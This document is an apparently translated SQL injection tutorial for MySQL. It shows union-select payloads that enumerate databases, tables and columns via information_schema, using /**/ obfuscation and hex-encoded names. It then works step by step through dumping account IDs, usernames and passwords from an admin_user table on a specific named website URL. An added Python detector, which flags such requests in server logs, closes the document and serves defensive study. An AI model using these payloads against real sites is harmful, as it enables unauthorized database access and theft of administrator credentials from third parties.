Query databases

id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Query tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<HEX value of the database name>/**/limit/**/1,1

Query columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<HEX value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hexadecimal encoding of the database name yd_teamnet)
Dumping this way, the admin_user table appeared at the 4th result.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
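
Seen from the web-server log, the requests above share four traits: `/**/` standing in for spaces, `union select`, a reference to `information_schema`, and hex literals in place of quoted names. The following is an added detection example, not part of the original post; the function names, signal names and the alerting rule are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # closed /* ... */ comment
COMMENT_AS_SPACE = re.compile(r"\w/\*.*?\*/\w")   # e.g. union/**/select
SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(
        r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
}

def normalize(raw_query):
    """Decode, lowercase and strip SQL comments so keywords become adjacent."""
    text = unquote_plus(raw_query).lower()
    text = INLINE_COMMENT.sub(" ", text)
    text = text.split("/*", 1)[0]      # drop an unterminated trailing /* comment
    return " ".join(text.split())

def signals(raw_query):
    """Return the names of the indicators present in one query string."""
    clean = normalize(raw_query)
    found = [name for name, rx in SIGNALS.items() if rx.search(clean)]
    if COMMENT_AS_SPACE.search(unquote_plus(raw_query)):
        found.append("comment_as_space")
    return found

def is_suspicious(raw_query):
    """Assumed rule: alert on UNION SELECT, or on any two other signals."""
    found = signals(raw_query)
    return "union_select" in found or len(found) >= 2

# First entry: query string of the table-listing request shown above.
# The other two are constructed benign requests.
SAMPLES = [
    "ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5"
    "/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA="
    "0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "ccausid=13240",
    "q=credit+union+hours",
]

if __name__ == "__main__":
    for query in SAMPLES:
        print(is_suspicious(query), signals(query), query[:50])
```

Pattern matching of this kind only surfaces probing in logs; the fix for the vulnerable parameter itself is a parameterized query with the id validated as an integer.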